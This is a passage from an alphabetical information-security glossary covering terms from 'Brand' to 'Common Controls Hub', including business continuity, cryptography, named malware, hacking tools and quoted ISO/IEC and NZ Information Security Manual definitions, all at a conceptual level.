and services) e.g. “They are trustworthy and high quality”. Whereas
logos and phrases may be trademarked,
inventions patented,
designs
registered and written/spoken words copyrighted, the intangible component of
brands makes them difficult to describe let alone protect, yet brands can be extremely
valuable, if vulnerable,
corporate information
assets. “Marketing-related intangible asset including, but not
limited to, names, terms, signs, symbols, logos and designs, or a combination
of these, intended to identify goods, services or entities, or a combination
of these, creating distinctive images and associations in the minds of
stakeholders, thereby generating economic benefits/values” (ISO
10668). See also reputation.
|
[Monetary] Brand value
|
“Economic value of the brand in transferable monetary
units. Note: The result obtained can be either a single economic value or a
range of values” (ISO 10668).
|
Breach
|
Form of information
security incident
normally involving deliberate action by someone, as opposed to those with
purely accidental
causes, for example penetrating
a defensive
barrier such as a wall or firewall,
or actively compromising
security in general.
|
Bribe,
bribery
|
The offered, promised or actual provision and acceptance
of illicit financial or other inducements with the expectation of favours in
return, such as the opportunity to bid favourably for or enter into a
contract, or lenience (‘turning a blind eye’) following a compliance
failure. A form of corruption
and malfeasance
that, despite being both unethical
and illegal, is an integral part of business life in some cultures
and industries.
|
Bricking,
PDoS
(Permanent Denial of Service)
|
To damage a device
and take it out of service in such a way that it is impossible or uneconomic
to recover it, making it ‘as useful as a brick’. May result from an accident (such as
a bug or error when updating
flash BIOS, or mechanical damage such as dropping the device in the sea) or a
deliberate attack.
|
BrickerBot
|
Malware
that infects things and, if
they fail a simple security test, irreparably damages their file systems,
thus bricking
them. A vigilante
worm.
|
Brownout
|
Reduction in power supply voltage lasting more than just a
few micro- or milliseconds, enough to dim incandescent lights (hence the
name) and cause the failure of electronic systems having inadequate voltage
regulation. See also dip,
surge, spike and blackout.
|
Browser
hijack
|
Malware
attack that
changes the user’s
normal browser home page or new tab selection to bring up some other inappropriate/unsafe
website.
|
Brute
force
|
(a) Form of cryptanalytic attack in which multiple passwords, PINs or encryption keys are entered in
rapid succession in an attempt to guess the correct one by chance, exhausting
the key space.
Often involves automated tools such as rainbow tables but may be performed
manually against low-entropy
PIN codes and weak passwords. (b) A
straightforward attack on physical security, such as ram-raiding,
chain-sawing through fences and walls, or threatening/assaulting security guards
or receptionists.
|
BS7858:2012
|
British Standard code of practice for pre-employment
security screening (background
checks and security
clearance).
|
Buffer overflow
|
Software
bug that allows – or
fails to prevent – a buffer space in memory being over-filled with excessive
amounts of data,
such that it overwrites adjacent memory locations. While this normally
results in the program simply crashing, hackers are adept at crafting malicious data in
such a way that the overspill is directly executed or points to another memory
location where exploit
code has also been inserted. Buffers are used to hold interim values and the
results of internal calculations and text operations as well as to hold data
input through the keyboard or arriving through the network: internal buffers may also be vulnerable to
overflows if unchecked.
|
Bug
|
(a) Programming fault accidentally inserted into a program by a
programmer. Most bugs are relatively benign but some create vulnerabilities
that may lead to security
incidents such as a crash
or compromise.
See also web bug
and flaw. (b) A covert surveillance device used to snoop surreptitiously
on the online activities, conversations etc. of a target, potentially compromising trade secrets
or personal
information.
|
BULLRUN
|
TOP
SECRET NSA
‘decryption program’ disclosed by whistleblower Ed Snowden. Part of a global surveillance/SIGINT framework
systematically snooping on encrypted
traffic including SSL
and (some) VPNs. A
similar program in the UK is called Edgehill.
|
Burglary
|
Trespass
with intent to steal.
|
Burp
suite, Burp
|
Network
hacking/penetration testing
tool for attacking
Web applications.
Free and commercial versions.
|
Business-critical,
mission-critical
|
Class
of information
asset, business function, process etc. that is vitally
important to the organisation’s
core purposes, objectives
or mission. The potential severity of information security incidents affecting such assets (the scale and nature of the impacts) implies
that realistic threats
acting on known vulnerabilities
almost certainly qualify as high risks.
See also Tier 1, 2 or 3
and safety-critical.
|
Business continuity
|
Term encompassing the resilience, recovery and contingency arrangements and plans used to mitigate the effects of incidents and disasters
affecting information
processes, IT systems, networks and
business processes, supply chains etc.
|
Business Continuity
Management (BCM)
|
The process
of directing, controlling
and overseeing
the organisation’s
approach to business
continuity, such as business
impact assessment to characterize business-critical processes and identify
the supporting systems
and resources, plus the production, exercising and maintenance of the business continuity plans
etc.
|
Business Continuity
Management System
(BCMS)
|
The management
system for business
continuity.
|
Business Continuity
Plan, Plans or Planning
(BCP)
|
A pre-considered preparative approach intended to ensure
the continued operation of essential business processes (including essential supporting
systems,
resources and so forth), despite serious incidents or disasters that might occur, through a
suitable combination of controls
such as resilience,
disaster recovery and
contingency
arrangements that will minimize the impacts. Cf. Best Current
Practice.
|
Business directory fraud
|
Through social engineering, fraudsters manipulate victims into over-paying for entries in
business directories, listings or databases
that are largely worthless and may not even exist. Common techniques include
persistent cold-calling and spamming,
misrepresenting
the directories, misleading websites, submitting invoices to ‘renew’ non-existent
subscriptions directly to lowly procurement or accounts clerks or personal
assistants, innocuous-looking forms using the word ‘insertions’ (meaning paid
advertisements) in the small print, inducements such as ‘free offers’ and
entries in business awards, and baseless coercive threats from self-styled ‘debt collection
agencies’.
|
Business Email Compromise
|
See BEC
and VEC.
|
Business Impact
Assessment
[or Analysis]
(BIA)
|
That part of risk analysis which involves reviewing the
potential business impacts
of more or less serious information
security incidents
on critical business processes,
in order to determine the associated availability and conceivably other
information assurance
or security requirements.
|
Business Resumption
(or Recovery) Plan (BRP)
|
Preparations to enable essential business activities to be
recovered or restored following a disaster that has disrupted them, typically
by providing business-critical
information
services from an alternate location.
|
BYOC
(Bring Your Own Cloud)
|
Corporate scheme allowing workers to use certain cloud computing
services for business purposes, provided suitable information security controls (such as policies concerning classified
information, strong user
authentication,
data encryption and
other access controls)
are employed. Unless blocked by network
security controls, cloud apps
(such as Google Docs or Office365) and cloud storage (such as Google Drive or
Dropbox) may be used by workers to exfiltrate valuable information from the organisation,
while malicious
cloud apps are a form of malware.
|
BYOD
(Bring Your Own Device)
|
Corporate scheme allowing workers to use their PODs for business purposes, provided
suitable information
security controls
are employed (e.g. policies,
MDM, encryption and antivirus software).
|
BYOT
(Bring Your Own Thing)
|
Corporate scheme allowing workers to use their things for business purposes, provided
suitable information
security controls
are employed (e.g. policies,
MDM, encryption and antivirus software).
|
Byzantine
fault
|
A class of system
failures with symptoms or characteristics that depend on the observer’s
perspective or context. A faulty system may present differing data to different observers, data that may appear
normal to some of them, frustrating the use of simple consensus to spot
and react to exceptions.
|
Byzantine
Fault Tolerance
(BFT)
|
System
architecture
designed to avoid or at
least identify
and respond
appropriately to [some types of] Byzantine fault.
|
Caesar’s
cipher
|
Cryptographic
algorithm
originally used by Julius Caesar to encrypt secret messages for soldiers in
the Roman colonies. A simple monoalphabetic substitution cipher, easy to break today but evidently
adequate to meet Caesar’s data
confidentiality
requirements back then. See also Vigenère’s cipher.
|
Cain and
Abel,
“Cain”
|
Password
recovery and hacking
tool capable of brute-force
and dictionary
attacks on a wide
variety of password hashes
and cryptographic
keys, on Windows systems.
|
Caller
ID (identity)
|
Technical facility to display and store a phone caller’s
phone number on the called phone, enabling the recipient to identify the
caller, call them back etc. Unfortunately, the technology is not
sufficiently secure to prevent social engineers spoofing their numbers (e.g. so
fraudsters
appear to be calling from a bank’s number).
|
CANbus
(Controller Area Network bus)
|
Communications standards for microcontrollers (Electronic Control
Units) and other electronic devices
in vehicles, developed by Bosch. The primary security requirements in such environments
are to ensure data
and system integrity and availability.
|
CANVAS
|
Costly commercial network security/penetration test tool from IMMUNITY.
Automates hundreds of exploits
against known vulnerabilities.
|
Capability
|
Ability, competence, suitability, capacity and/or
willingness to do something successfully. “Quality of being able to
perform a given activity” (ISO 19440:2007).
|
Capacity
|
Capability
of an IT system, database, network, generator etc.
to deliver the required services, process
the requisite number of transactions, store sufficient data etc. Related to availability
and performance.
See also capacity
management.
|
Capacity management
|
Dynamically aligning the provision of IT systems and services with changing
demands, in order to maintain appropriate service levels (availability
and performance).
|
Capture The Flag
|
See
CTF.
|
Carbanak
|
Bank
Trojan in-the-wild,
built using Carberp.
|
Carberp
|
Crimeware
kit for building Trojans.
As with Zeus, the
source code for Carberp was released onto the Internet.
|
Carder
|
Criminal who steals, counterfeits, trades and/or validates credit
card data.
|
Carding
|
Stealing, counterfeiting,
trading or validating
credit card data.
|
Careless
|
Without due
care, failing to act sufficiently cautiously under the
circumstances. Less severe than negligent or reckless.
|
Carnivore
|
Early Internet
surveillance
system
implemented by the FBI
in 1997 as PC software, capable of selectively monitoring the Internet
traffic to/from specified users
by ‘packet
sniffing’ on particular network
cables. Based on even earlier surveillance systems (such as Omnivore).
Renamed DCS1000 to appear less threatening. Superseded in 2001 by
ever more sophisticated and capable remote, distributed surveillance systems.
|
CARTA
(Continuous Adaptive Risk
and Trust Assessment)
|
Assurance
approach involving security monitoring that is continuous (as opposed
to periodic e.g. penetration testing),
integrated across all levels (from the hardware platform to the applications) and
adaptive (responding to risks in real time e.g. using SOAR).
Concept promoted by Gartner in 2018.
|
CASB
(Cloud Access Security Broker)
|
Similar to a firewall, the CASB acts as a trusted
go-between linking cloud computing users with their Cloud Service
Providers, applying security rules to the commands and data
passing through.
|
Cascade,
cascading failure
|
Information
security incidents
adversely affecting something (such as electricity generation) on which
something else depends (most electrical and electronic devices in that case) are likely to cause
widespread, rolling and longer-lasting disruption as the effects spread, with
additional impacts
further down the line. Therefore, incidents which harm critical infrastructure are likely to be
magnified by the consequential impacts over an extended timeframe.
|
Cashing
out
|
Hacker
phrase for the process
of converting “hot” (stolen) information assets into untraceable cash
through various black
market trades and money laundering schemes. See also monetize.
|
CATNAP
(Cheapest Available Technology/Technique Narrowly
Avoiding Prosecution)
|
Spending the least amount necessary to satisfy the letter
of the law, where there is no apparent business advantage in going any
further. A drawback of setting low hurdles in compliance-driven cultures.
|
Caveat
|
Warning or proviso. “A marking that indicates that the
information has special requirements in addition to those indicated by the
classification. The term covers codewords, source codewords, releasability
indicators and special-handling caveats” (NZ Information Security Manual).
|
CBEST
|
UK financial services industry scheme, based on CREST, to accredit and
guide penetration testers
in testing banking systems.
|
CCM
(Cloud Controls Matrix)
|
Generic suite of information security controls applicable to various types of cloud computing
services, as defined by the CSA.
Addresses both the service providers’ and consumers’ perspectives.
|
CCPA
(California Consumer Protection Act of 2018)
|
An EU-style privacy
law coming into force in January 2020, imposing obligations on medium to large commercial
organisations to ‘implement and maintain reasonable security procedures and
practices’ in order to protect personal data (as defined in the Act) and giving
Californians the right to opt
out of companies selling their personal data.
|
CCTV
(Closed Circuit TeleVision)
|
Private audio-visual surveillance system typically used by security guards
to monitor
premises, safes/vaults
etc. for intruders,
thieves and saboteurs,
by local councils, public bodies and the police to oversee public places for disorder,
crimes and safety issues, and by industrial plant operators to monitor the
state of the plant. Modern CCTV systems typically use high definition
digital IP cameras
on a network.
|
CDN
(Content Delivery Network)
|
Essentially a geographically-dispersed commercial Web
content caching service that, where possible, delivers content from copies
held on Web servers
near to the user
rather than from the original sources. Reduces latency, increases download
speeds, and can help mitigate
the effect of Denial
of Service attacks
and other incidents.
|
Cease
and desist letter,
demand letter,
infringement notification
|
A lawyer’s letter formally requiring someone permanently
to stop doing something, generally reinforced with an explicit or implicit threat to take legal
action against them if they persist.
|
Cerber
|
One of several species
of ransomware
in the wild
that surreptitiously encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys. Evidently
does not run on Russian-language computers, hinting at its possible origin.
Available to rent as Ransomware
as a Service. Flawed
cryptosystem
in the initial version has presumably been replaced in Cerber 2.
|
CERT
(Computer [or Cyber] Emergency
Response Team),
CIRT
(Computer [or Cyber] Incident
Response Team)
|
An IRT
that specifically handles IT-related incidents. Many countries have national
CERTs, globally supported and coordinated through the CERT-Coordination
Center (CERT/CC) in Carnegie Mellon University’s Software Engineering
Institute.
|
Certification
|
The process by which something is formally evaluated
against a set of pre-defined criteria and, if appropriate, confirmed compliant. “A
procedure by which a formal assurance statement is given that a deliverable
conforms to a specified standard” (NZ Information Security Manual).
|
Certification Authority
(CA)
|
Trusted
body that digitally
signs and issues digital certificates to authenticated
users or systems in a PKI. “Authority
trusted by one or more users to create and assign public-key certificates.
Notes: Optionally, the certification authority can create the users' keys.
The role of the certification authority in this process is to guarantee that
the individual granted the unique certificate is, in fact, who he or she
claims to be. Usually, this means that the CA has an arrangement with an
institution which provides it with information to confirm an individual's
claimed identity. CAs are a critical component in information security and
electronic commerce because they guarantee that the two parties exchanging
information are really who they claim to be.” (ISO/IEC 27033-1). “An official
with the authority to assert that a system complies with prescribed controls
within a standard” (NZ Information Security Manual).
|
Certification body,
registrar
|
Accredited
organisation
deemed sufficiently independent, competent, diligent and trustworthy to review and certify
other organisations’ compliance
with specifications or requirements formally defined in applicable standards or
regulations such as ISO/IEC
27001. See also Certification
Authority.
|
Certification documents
|
Compliance
certificates, statements etc. “Documents indicating that a
client's ISMS conforms to specified ISMS standards and any supplementary
documentation required under the system” (ISO/IEC 27006).
|
Certification Practice Statement (CPS)
|
Policy
document
formally and explicitly defining a given PKI.
|
Certification report
|
“A report generated by a certification body of a Common
Criteria scheme that provides a summary of the findings of an evaluation”
(NZ Information Security Manual).
|
Certificate Revocation
List
(CRL)
|
A published list of digital certificates that have been
revoked by the Certification
Authority and are therefore invalid. PKI systems are supposed to check for,
and handle, certificates that have been revoked, for instance if the CA has
been compromised
meaning that fake
certificates are or might be in circulation.
|
Certifi-Gate
|
Vulnerability
in digital
certificate handling by some privileged remote access/systems administration tools on Android, exploited by malware in 2015.
|
Chain
letter
|
An item of correspondence (originally a postal letter,
latterly an electronic message such as an email) that entreats the recipient to pass it
on to further recipients. The content of chain letters varies and, although
some are legitimate,
most fraudulently
use social
engineering techniques to part fools from their valuables (e.g. pyramid schemes).
Apart from consuming network
bandwidth, data
storage capacity, wasting users’
time and fooling victims,
chain letters sometimes gain false respectability as a result of being passed
on, and effectively endorsed, by trusted
but foolish intermediaries.
|
Chainmail
|
Flexible but heavy body armour constructed from interlocking
steel rings, guarding against glancing blows. Supplemented by armour plates,
shields and helmets protecting the most vulnerable areas of the body against
direct hits and penetration by weapons.
|
Chain
of custody
|
Maintenance of a complete, accurate and trustworthy record of the physical
custody and treatment of forensic
evidence at every point between its original collection and
eventual presentation in court, such that there is no reasonable doubt as to
its origin, authenticity
and integrity.
“Demonstrable possession, movement, handling and location of material from
one point in time until another” (ISO/IEC 27050-1).
|
Challenge
|
(a) Pose a question intended to raise or dispel doubt or
concern, or to elicit a strong reaction, for example a lawyer cross-examining
a witness in court. (b) Something difficult to overcome or complete
successfully.
|
Challenge-response
|
Protocol
or process in
which the respondent has to provide the correct, anticipated response or credential,
otherwise the challenger knows something is amiss. Mediaeval gatekeepers
demanded “Who goes there?” in anticipation of a visitor revealing the secret password to authenticate
themselves and be allowed to pass through a gate. Nowadays used to establish network
communications by confirming that a counterparty holds the correct private key without actually disclosing the key
over the network: typically the challenger supplies a nonce, the respondent encrypts it with their private key and returns it, and the challenger
then decrypts the
response with the respondent’s public
key to verify that the respondent does in fact hold the
corresponding private key (a zero knowledge approach).
|
CHAMP
(Counter-electronics High-powered microwave
Advanced Missile Project)
|
Boeing EMP
cyberweapon
which directs intense bursts of electromagnetic energy at selected target buildings
(and perhaps vehicles and other cyberweapons) from a passing aircraft or drone in order to
destroy/disable the electronic systems,
devices, IT systems and network
infrastructure within.
|
Chance
|
See probability.
|
Change
control
|
Management
process for
proposing, reviewing
and accepting or rejecting changes to a process, system and/or the associated documentation.
Part of change
management.
|
Change
key
|
Conventional physical locks are designed to be unlocked only by keys having the
corresponding patterns, keys which will not open locks of other patterns:
these single-lock keys are known by locksmiths as change keys. Cf. master keys.
|
Change
management
|
The totality of activities used to plan, risk-assess,
authorize, control, direct and document changes
to the organisation
and its IT systems,
business processes,
products etc.
|
Chatham
House rule
|
An informal arrangement (a gentleman’s agreement) to
protect the anonymity
of information
sources at meetings. “When a meeting, or part thereof, is held under the
Chatham House Rule, participants are free to use the information received,
but neither the identity nor the affiliation of the speaker(s), nor that of any
other participant, may be revealed” [Chatham House].
|
Cheat
|
A dishonest
person who deliberately bends or breaks the rules for personal gain. A relatively
minor fraud.
|
Checkpoint
|
(a) A static record or snapshot of the state of a computer
system, program, database etc. at
one point in time to which the system may be rolled-back if necessary. See
also backup. (b)
A physical
guard house or similar place manned by security guards through which people must
pass some sort of inspection (e.g. checking ID cards, metal detectors).
|
Checks and balances
|
The reconciliation
of accounts or data
files compiled separately but supposed to match item-for-item, for example in
double-entry
bookkeeping every credit should correspond to an equal and
opposite debit, hence the total of a debit account should precisely equal the
total of the matching credit account.
|
ChewBacca
|
One of several species
of memory-scraping
malware in the
wild.
|
Chief Security
Officer
(CSO)
|
Director or senior/executive manager with overall responsibility
for security, including physical
security and perhaps information
security. Chairs the Security Committee and reports to executive management.
See also CISO.
|
Chinese
wall,
paper wall
|
Notional physical isolation or air-gap separation between people,
business functions/departments/units, organisations, networks, systems etc. intended to prevent
the inappropriate passage of confidential information between them, avoid conflicts of
interest and/or maintain divisions of responsibility.
|
Chip-n-PIN,
chip and PIN,
chip card
|
Physically
secure payment, charge, store, bank, credit, debit or EFTPOS card
containing an embedded cryptographic
module – in practice, a small integrated circuit laminated within
the card. Compared to magnetic stripe cards, it is extremely difficult for forgers to duplicate
well-designed and
implemented cryptographic modules due to their physical and logical security
controls. Normally, the user
must enter their correct PIN
code into the chip-n-PIN card reader to authenticate themselves and ‘unlock’ the
card (multi-factor
authentication), further controlling against loss or theft of the
card provided neither the card reader nor the PIN code have been compromised (two
known modes of attack).
|
Chipzilla
|
See meltdown.
|
Chosen
plaintext
|
Cryptanalytic
technique in which the analyst can obtain the cyphertext corresponding to some plaintext of his
choosing, which acts as a crib.
See also known
plaintext.
|
Christmas
tree
|
One of the earliest network worms, released in 1987. Less damaging
than The Internet
Worm.
|
CIA
(Central Intelligence Agency)
|
Spooky
US government agency responsible for overseas intelligence and intelligence on
foreigners, relating to illegal drugs, arms trafficking, terrorism etc. See also FBI and DHS.
|
CIA
triad
|
The primary objective
of information security
is to protect information
assets against the compromise
of their Confidentiality, Integrity
and Availability (CIA). In addition to those
three, other objectives may also be relevant under various circumstances e.g. assurance, auditability, accountability,
non-repudiation
and compliance.
Cf. Parkerian
hexad.
|
Cipher
|
A message written in a secret code, or the mechanism for
generating it. See algorithm.
|
Circumstantial evidence
|
Forensic
evidence that is peripheral, implicated or related in some
indirect way with an incident,
requiring inference to make the association. Cf. direct evidence.
|
CIRT
|
See CERT.
|
CISA
(Certified Information Systems Auditor)
|
The preeminent qualification for ICT auditors worldwide, issued by ISACA.
|
CISA
(Cybersecurity Information Sharing
Act)
|
US law to encourage the sharing of cyberthreat indicators between US corporations and
the US government by limiting their liabilities in so doing.
|
CISO
(Chief Information Security Officer)
|
Executive
with overall responsibility
for the governance
and management
of information
risks. See also CSO
and ISM. “A
senior executive who is responsible for coordinating communication between
security, ICT and business functions as well as overseeing the application of
controls and security risk management processes within an agency” (NZ Information Security Manual).
|
Citadel
|
RAT,
generated using the Zeus
crimeware kit,
that installs a remotely-configurable botnet
to mount various attacks.
|
Citizen programmer
|
Largely untrained and self-taught amateur software developer
who writes spreadsheets, macros, utilities, databases, custom reports and/or other
programs more as a hobby interest than a profession. See also End User Computing.
|
Claim
|
Assertion
or verifiable
statement of fact e.g. a patent claim defines possible
applications of an invention protected by the patent; an insurance claim is an application by an
insured party for compensation under the policy as a result of an insured event; manufacturers’
claims regarding their products (goods and services) may include information security,
privacy and
other features and strengths.
|
Clark-Wilson
model
|
Formal model or
architecture developed by David D. Clark and David R. Wilson in 1987 that elaborates on the Biba model to protect the integrity of information in general, not just computer data.
|
Class,
classify, classification
|
Pragmatic grouping-together of similar or related information assets
that are believed to share similar risks
and hence control
requirements. While classification is a quick process that reduces the need
individually to risk
assess and identify security controls needed to protect every single asset in each class, the appropriate
generic controls still need to be applied. Furthermore, generic controls may
not be ideal for a specific situation, hence higher classes may require more
intense risk analysis
and bespoke controls. Classification typically involves confidentiality
or privacy
criteria but more complex schemes may also take account of integrity and availability
requirements. Unfortunately, there is no universal agreement on
classification labels and their meanings, hence in addition to the compliance
issues within any organisation
there are additional risks of misinterpretation leading to inadequate
or inappropriate security when classified materials are shared between organisations.
|
Classified information
|
“Government information that requires protection from
unauthorised disclosure” (NZ Information Security Manual).
|
Classified systems
|
“Systems that process, store or communicate classified
information” (NZ Information Security Manual).
|
Clear
|
A basic low-assurance
form of sanitisation.
“Sanitize using logical techniques on data in all user-addressable storage
locations for protection against simple non-invasive data recovery techniques
using the same interface available to the user” (ISO/IEC 27040).
|
Cleartext
|
See plaintext.
|
Click
bait, click-bait, clickbait
|
Something attractive or intriguing (such as fake news and
scantily clad people) that lures unsuspecting computer users to click a link, open an
attachment, install or run a program or whatever, leading typically to their devices being infected with malware and/or
their being defrauded
or otherwise compromised.
A form of social
engineering. The thriving underground market in clickbait pays a
premium for clickbait pages with tens or hundreds of thousands of visitors,
especially affluent Westerners.
|
Click
fraud
|
Fraud
techniques targeting
click-through affiliate marketing schemes that pay a bounty for visitors’
clicks. In one form, malware
surreptitiously swaps genuine affiliate codes embedded in URLs and cookies
for codes to the fraudsters’
own accounts. In another, malware racks up large pay-per-click charges
and/or artificially inflates website reputational ratings (and hence
commercial value) by ‘clicking’ online advertisements.
|
Clickjacking
|
Hacking
technique that surreptitiously and unexpectedly diverts visitors’ browsers to
a different website, typically then launching malware attacks against visitors’ ICT devices. See also click fraud.
|
Click-regret
|
The sinking feeling that follows an unwise click on a
dubious link, app,
attachment or security warning message.
|
Clipper
chip
|
Failed US government initiative in the mid-1990s to
introduce a cryptographic
subsystem on a proprietary computer chip using Skipjack with cryptographic keys recoverable by the authorities,
allowing them to decrypt
data at will.
Aside from flaws in
the cryptographic design,
introducing additional security vulnerabilities, and the obvious trust, privacy and oversight issues
relating to key escrow
and surveillance,
black hats
would simply avoid Clipper thus negating its alleged purpose. The project’s
incredible naïveté hints at ulterior motives: the real goal might have
been to raise awareness
of the social issues arising from the use of strong encryption, particularly by criminals and
terrorists.
Side-effects included stimulating the dissemination and use of other strong
encryption systems,
and a backlash against invasions of privacy by the authorities.
|
Clone,
cloning
|
Controlled
security devices
such as authentication
tokens and passes, keys, virtual systems,
databases, programs etc.
are vulnerable
to being duplicated/copied illicitly unless there are adequate preventive
and/or detective
controls. They may also be cloned for legitimate reasons such as backups, business continuity,
disaster recovery,
hardware replacement, testing or forensic purposes.
|
Close call, close shave,
dodging the bullet
|
See near
miss.
|
CLOUD
(Clarifying Lawful Overseas Use of Data)
Act
|
Another US law with a contrived name, this one concerning
requests to the US by foreign organisations for intercepted data. Provisions in the law are intended
to authorize
and facilitate appropriate requests for legitimate law enforcement purposes but block inappropriate
disclosures.
|
Cloud
bursting
|
Capacity
management technique whereby private cloud services temporarily
utilize public cloud
services to handle peaks in demand.
|
Cloud
computing,
cloud services,
cloud computing services,
cloud
|
Provision of distributed, network-based information processing services within a Service
Oriented Architecture typically giving ‘access from anywhere’ (meaning users typically only
need a compatible browser and network connection) and service elasticity or
flexibility (adjusting performance
by dynamically allocating capacity
behind-the-scenes from pooled resources using the CSP’s automated systems- and network-management processes). However, cloud computing can
raise governance,
ownership, compliance and
other information security
and privacy
issues.
|
CloudCracker
|
Cloud-based commercial service that offered to crack, by brute force attack, the NT hash values used as
part of the PPTP (Point to Point Tunnelling Protocol)
and MS-CHAP cryptographic
processes.
|
Cloud
Smart
|
The common name of a US government federal strategy on cloud computing,
including the commercial, information
security and other aspects. A 2018 update to Cloud First, the
original strategy from 2010.
|
Cloud
storage,
Web storage,
online storage
|
Facility to access
remotely stored data
through the Internet.
As with cloud
computing, the geographical storage location is unknown to the user, which can raise governance, ownership, compliance and
other information security
and privacy
issues, while the involvement of external organisations and network communications may expose proprietary data
to various risks
including unauthorized
access, corruption
and denial of
service.
|
Cluster
|
Two or more closely-coupled computer servers configured to appear as a single
operating unit, sharing the processing
load and (usually) disks. Can provide higher availability/resilience and performance than a single computer,
albeit with additional costs, complexity and associated constraints.
|
Cluster
of PII
|
“PII which is processed for a consistent functional
purpose. Note: Clusters of PII are described independent from technical
representation of data objects. On a regular basis, the clusters of PII also
include PII which is not stored electronically” (ISO/IEC 27555 draft).
|
CME
(Common Malware Enumeration)
|
Process run by MITRE to assign a common ID to new malware that may
otherwise be identified/named independently by several antivirus companies or malware analysts,
causing confusion.
|
CMMC
(Cybersecurity Maturity Model
Certificate)
|
US Department of Defense cybersecurity assurance scheme for assessing/auditing
and rating defense suppliers between “Basic Cybersecurity Hygiene” and
“Advanced” levels, according to the nature and quality of the cybersecurity
controls they are operating, in order to protect CUI as it is passed through supply chains.
|
CNSSI-4009
|
US Committee on National Security Systems Instruction
№ 4009: Glossary.
|
Code,
coding,
decoding
|
The use of words, symbols, strings, phrases, sounds or
images to represent and communicate messages. A relatively crude application
of (usually monoalphabetic)
substitution,
rendered somewhat more secure through the use of multiple code books, one-time pads, steganography etc. For example,
“Attack at dawn!” might be represented or signalled by the seemingly
innocuous mention of, say, “native daffodils” at some point in an otherwise legitimate news
broadcast, web page, press release, blog posting, tweet or private ad in the
personal columns of a national newspaper. Codes (such as Morse code, ASCII
and ‘computer code’ meaning program instructions) and obscure languages (such
as Navajo or Cockney) are not necessarily deliberately secretive, cryptic or covert but may
appear so to non-experts.
|
Code
book,
codebook
|
If the list of code
words etc. is too long to remember and communicate reliably to those
who need to code or decode
messages, it may be necessary to prepare and distribute one or more lists
from which to look up codes and their plaintext equivalents. The security
issues are similar to those associated with the generation and distribution
of encryption keys e.g. ensuring
that code books do not fall into enemy hands and cannot simply be
reconstructed by the enemy through educated guesswork or cryptanalysis.
|
Code
injection
|
Hacking
techniques to insert malicious
content into programs during their execution, exploiting various operating system and application flaws and bugs, specifically injection flaws.
Used by some malware.
See also AtomBombing,
XSS and HTML injection.
|
Code
of ethics
|
A comprehensive set of rules, ideals, objectives, principles, practices and/or values
deemed ethical
by the organisation,
culture
or society. Given that a written code cannot realistically cover all
possible ethical issues, a substantial part inevitably remains unstated:
however, workers
are expected to interpret and apply the guidance sensibly when facing novel
situations and dilemmas,
acting in the best interests of the organisation, culture or society.
|
Code
Red
|
A network
worm that infected insecure
unpatched Web servers running
Microsoft IIS software
in 2001. Websites were defaced with “HELLO! Welcome to http://www.worm.com!
Hacked By Chinese!”
|
Coercion
|
Assertively
or aggressively forcing someone to do something against their wishes (e.g.
pay a ransom to
recover their data),
typically through physically intimidating, threatening or blackmailing them, putting them under duress.
|
Coercivity
|
The magnetic force that will completely demagnetize a
ferromagnetic material, such as when wiping the data stored on a hard disk or mag-stripe
bank card. Measured in Teslas. “A property of magnetic material, used as
a measure of the amount of coercive force required to reduce the magnetic
induction to zero from its remnant state” (NZ Information Security Manual).
|
Cognitive
systems
|
Advanced IT
systems capable of artificial intelligence and/or machine
learning, augmenting the intellectual capabilities of us humans. While the information risks
associated with cognitive systems may be challenging, they show promise in
the cybersecurity
field, for example intelligent network/system
intrusion, malware and fraud detection,
prevention and response.
|
Coinhive
|
One of several species
of cryptominer
malware in the wild in
2018. Infected systems
mined Monero cryptocurrency
for the VXers and
criminals behind the attacks.
|
CoinVault
|
One of several nasty species of ransomware in the wild that surreptitiously and
strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys. Uses 256-bit AES.
|
Cold
site
|
Secondary location with a minimalist ICT facility that is little more than a
vacant room provided with electrical power and air conditioning. It may take
days, perhaps weeks to bring the site fully into operation in the event of a
disaster taking out the main site, assuming sufficient ICT equipment, data backups, people etc. are available
or can be obtained. This minimalist approach to disaster recovery may be somewhat
faster and less risky than buying or renting suitable accommodation on the
open market and may be appropriate for low-availability ICT services that are definitely not business-critical.
See also warm site,
hot site and mirror site.
|
Collection
|
(a) A set or group of related or associated items, such as
data in a database or stamps. (b)
The act or process
of locating and retrieving or gathering materials such as forensic evidence,
intelligence
or, yes, stamps. “Process of gathering the physical items that contain
potential digital evidence” (ISO/IEC 27037).
|
Collector,
handler
|
Someone who gathers intelligence on/about or from certain targets, using OSINT, HUMINT, SIGINT, black bag ops, agents and other
sources plus techniques such as deception,
surveillance
and subterfuge.
See also agent and
spy.
|
Collusion
|
Conspiracy and collaboration between individuals or organisations
to negate the division
of responsibilities, breach Chinese walls, commit fraud etc.
|
Co-location
|
Shared use of commercial data centre facilities by multiple
customers. “Installation of telecommunications facilities on the premises
of other telecommunications carriers” (ISO/IEC 27011).
|
Colossus
|
World’s first digital programmable computer, designed by Alan
Turing, Max Newman, Tommy Flowers and colleagues at the UK Government Code
and Cypher School at Bletchley Park, north of London, in 1943 during World War
II. Although it was programmed mechanically using patch cables and switches,
its sole purpose was to break encrypted
teleprinter messages by brute
force attack
on the keys used on
the German Lorenz cryptographic machines, hence arguably it was not a general-purpose
computer (cf. ENIAC)
but possibly one of the first cyberweapons.
|
Combination,
combination code
|
See PIN code.
|
Combination
lock
|
Physical
lock that can be
unlocked with the correct combination – normally a short alphanumeric
sequence (a PIN code).
|
Command and
Control
(C2, C&C)
|
Generally, systems
and processes
for directing and monitoring
diverse operations. In the hacking
context, C2 normally refers to the covert remote direction and management of malware botnets through the Internet by a bot master. In
the military context, C&C refers to the command structure, lines of
communication etc. used to monitor
and direct operations.
|
Comfort
zone
|
The domain within which we feel safe and secure, and
beyond which we feel uncomfortable - possibly threatened and/or vulnerable, in other words at risk.
|
COMINT
(COMmunications INTelligence)
|
Spying
on the content and nature of communications to gather useful intelligence information.
Part of SIGINT.
|
Commercially confidential,
commercial-in-confidence
|
A class
of business information
whose value to its owner
relies in part on it being withheld from competitors, customers etc.
See also trade secret.
|
Commit
point
|
Point at which one or more new, altered or deleted records
are actually recorded in a database.
Well-designed database
systems
incorporate controls
such as locks and control totals
to detect and prevent certain data
integrity incidents
occurring before the commit point, plus journaling and checkpoints to recover from certain
incidents that occur afterwards.
|
Common Controls
Hub
(CCH)
|
Commercial service from the Unified Compliance Framework
providing detailed information
on compliance
obligations
and other information
security, privacy,
information risk
management and governance-related
practices (called “controls” within CCH) recommended or required by a wide
variety of standards,
